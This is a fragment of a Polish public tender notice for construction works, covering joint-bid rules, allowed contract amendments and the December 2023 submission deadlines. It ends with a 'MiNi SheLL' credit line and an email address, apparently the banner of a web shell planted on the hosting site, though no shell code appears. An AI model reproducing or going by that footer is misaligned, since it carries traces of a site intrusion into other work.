Wykonawcy wspólnie ubiegają się o udzielenie zamówienia każdy z Wykonawców składa osobno w/w dokument.<br/>2.4. Ewentualne pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania Wykonawcy.<br/>Pełnomocnictwo winno być załączone do oferty w formie elektronicznej lub w postaci elektronicznej opatrzonej kwalifikowalnym podpisem elektronicznym, podpisem zaufanym lub elektronicznym podpisem osobistym, lub kopii poświadczonej elektronicznie przez notariusza kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub elektronicznym podpisem osobistym.<br/>2.5. Zobowiązanie podmiotu trzeciego (załącznik obowiązkowy w przypadku, gdy Wykonawca powołuje się na zasoby innych podmiotów w celu wykazania spełniania warunków udziału w postępowaniu) lub inny podmiotowy środek dowodowy potwierdzający, że wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasadami tych podmiotów.<br/>Ewentualne pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania Wykonawcy.<br/>Pełnomocnictwo winno być załączone do oferty w formie elektronicznej lub w postaci elektronicznej opatrzonej kwalifikowalnym podpisem elektronicznym, podpisem zaufanym lub elektronicznym podpisem osobistym, lub kopii poświadczonej elektronicznie przez notariusza kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub elektronicznym podpisem osobistym.<br/>Zobowiązanie podmiotu trzeciego (załącznik obowiązkowy w przypadku, gdy Wykonawca powołuje się na zasoby innych podmiotów w celu wykazania spełniania warunków udziału w postępowaniu) lub inny podmiotowy środek dowodowy potwierdzający, że wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasadami tych podmiotów. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do<br/>reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego Pełnomocnictwo winno zostać<br/>złożone w formie opisanej w pkt. 5.11 ppkt.1 ogłoszenia.<br/>2. W celu potwierdzenia braku podstaw wykluczenia z postępowania każdy z Wykonawców złoży osobno oświadczenie<br/>wymienione w pkt. 5.6. ogłoszenia.<br/>3. W celu potwierdzenia spełniania warunków udziału w postępowaniu każdy z Wykonawców złoży osobno dokumenty i oświadczenia wymienione w pkt. 5.7. ogłoszenia w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu<br/>4. W celu potwierdzenia, że osoba działająca w imieniu Wykonawcy jest umocowana do jego reprezentowania,<br/>Zamawiający żąda od wykonawcy wspólnie ubiegającego się o udzielenie zamówienia dokumentu, o którym mowa w pkt.5.11. ppkt.1. ogłoszenia.<br/>5. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, ponoszą solidarną odpowiedzialność za wykonanie umowy.<br/>6. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy wspólnie<br/>ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają usługi, do realizacji których te zdolności są wymagane. Wówczas wykonawcy wspólnie ubiegający się o udzielenie zamówienia<br/>dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy.<br/>7.Zamawiający nie narzuca osobistego wykonania przez poszczególnych wykonawców wspólnie ubiegających się o udzielenie zamówienia kluczowych etapów realizacji zadania. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Poza przypadkami wymienionymi w art. 455 ust. 1 pkt. 2) lit. b i c i 4) oraz ust. 2 ustawy Pzp, przewiduje się możliwość<br/>dokonania istotnych zmian postanowień umowy w stosunku do treści złożonej oferty na podstawie której dokonano wyboru<br/>Wykonawcy (Wyk.), dotyczących:<br/>1.1.Terminu zakończenia robót, o czas trwania przeszkody w następujących przypadkach:<br/>1.1.1.jeżeli przyczyny, dla których będzie zagrożone dotrzymanie terminu zakończenia robót, będą następstwem okol., za<br/>które odpowiedzialność ponosi Zamawiający (Zam.), w szczególności konieczności zmian dokumen. projek., w zakresie w<br/>jakim ww. okolicz. miały lub będą mogły mieć wpływ na dotrzymanie terminu zakończenia robót;<br/>1.1.2.gdy wystąpią niekorzystne warunki atmosferyczne uniemożliwiające prawidłowe wykonanie przedmiotu umowy (tj.<br/>przeprowadzenie prac, prób i sprawdzeń, dokonanie odbiorów) utrzymujące się co najmniej 7 dni, termin wykonania<br/>zamówienia może ulec przedłużeniu odpowiednio o liczbę dni, w których wystąpiły warunki atmosferyczne uniemożliwiające<br/>prawidłowe wykonanie przed. umowy;<br/>1.1.3.1.1.3. w przypadku wystąpienia nieprzewidzianych w momencie zawarcia umowy kolizji z planowanymi lub równolegle prowadzonymi przez Zamawiającego lub inne podmioty inwestycjami, w zakresie niezbędnym do uniknięcia lub usunięcia tych kolizji, w sytuacji gdy wykonywanie robót nie będzie możliwe ze względu na obowiązek skoordynowania robót z wykonawcą innych robót wykonywanych na terenie budowy termin wykonania zamówienia może ulec przedłużeniu odpowiednio o liczbę dni, w których nastąpiło wstrzymanie robot z w/w przyczyny.;1.1.4.w przypadku konieczności wstrzymania robót z przyczyn niezależnych od<br/>Wyk.;1.1.5.gdy wystąpią opóźnienia w dokonaniu określonych czynności lub ich zaniechanie przez właściwe organy<br/>administracji państwowej, które nie są następstwem okoliczności, za które Wykonawca ponosi odpowiedzialność;1.1.6.jeżeli<br/>wystąpi brak możliwości wykonywania robót z powodu niedopuszczenia do ich wykonywania przez uprawniony organ lub<br/>nakazania ich wstrzymania przez uprawniony organ z przyczyn niezależnych od Wyk.;1.1.7.wystąpienia siły wyższej czyli<br/>zdarzenia, którego Strony nie mogły przewidzieć, któremu nie mogły zapobiec ani któremu nie mogą przeciwdziałać, a które<br/>uniemożliwia Wyk. wykonanie w części lub w całości jego zobowiązań umownych;1.1.8.w przypadku odkrycia na terenie<br/>budowy przedmiotów, co do których zaistnieje podejrzenie, iż są to przedmioty o znaczeniu historycznym, bądź innych<br/>przedmiotów podlegających ochronie;1.1.9.w przypadku wniesienia odwołania przez Wyk. zgodnie z art. 513 pkt 1) i<br/>2).1.2.Zmiany wysokości wynagrodzenia związane z:<br/>1.2.1.koniecznością zrealizowania jakiejkolwiek części robót, objętej przed. umowy, przy zastosowaniu odmiennych<br/>rozwiązań technicznych lub technolog., niż wskazane w dokumentacji, a wynikających ze stwierdzonych wad tej<br/>dokumentacji lub zmiany stanu prawnego, w oparciu o który je przygotowano, gdyby zastosowanie przewidzianych<br/>rozwiązań groziło niewykonaniem lub nienależytym wykonaniem przedmiotu umowy;<br/>Cały zakres zmian został opisany w SWZ Rodz. XIX INFORMACJE DODATKOWE pkt.od 1 do 5.<br/>3.Dopuszczalne są również zmiany umowy oraz wprowadzenie nowych postanowień do umowy, które będą korzystne dla<br/>Zam., a które nie będą wykraczać poza treść oferty, na podstawie której dokonano wyboru Wyk., a zmiany nie będą istotne<br/>zgodnie z zapisami art. 454 ustawy Pzp.<br/>4.Ustala się, iż nie stanowi zmiany umowy w rozumieniu art. 454 ustawy Pzp:<br/>4.1.Zmiana numeru rachunku bankowego;<br/>4.2.Zmiana osób przeznaczonych do realizacji zamówienia;<br/>4.3.Zmiana danych teleadresowych.<br/>Zaistnienie okoliczności, o których mowa w niniejszym punkcie wymaga jedynie niezwłocznego pisemnego zawiadomienia<br/>drugiej Strony <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-12-20 08:45</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Platforma eZamawiający, https://umlebork.ezamawiajacy.pl/app/login</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-12-20 09:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com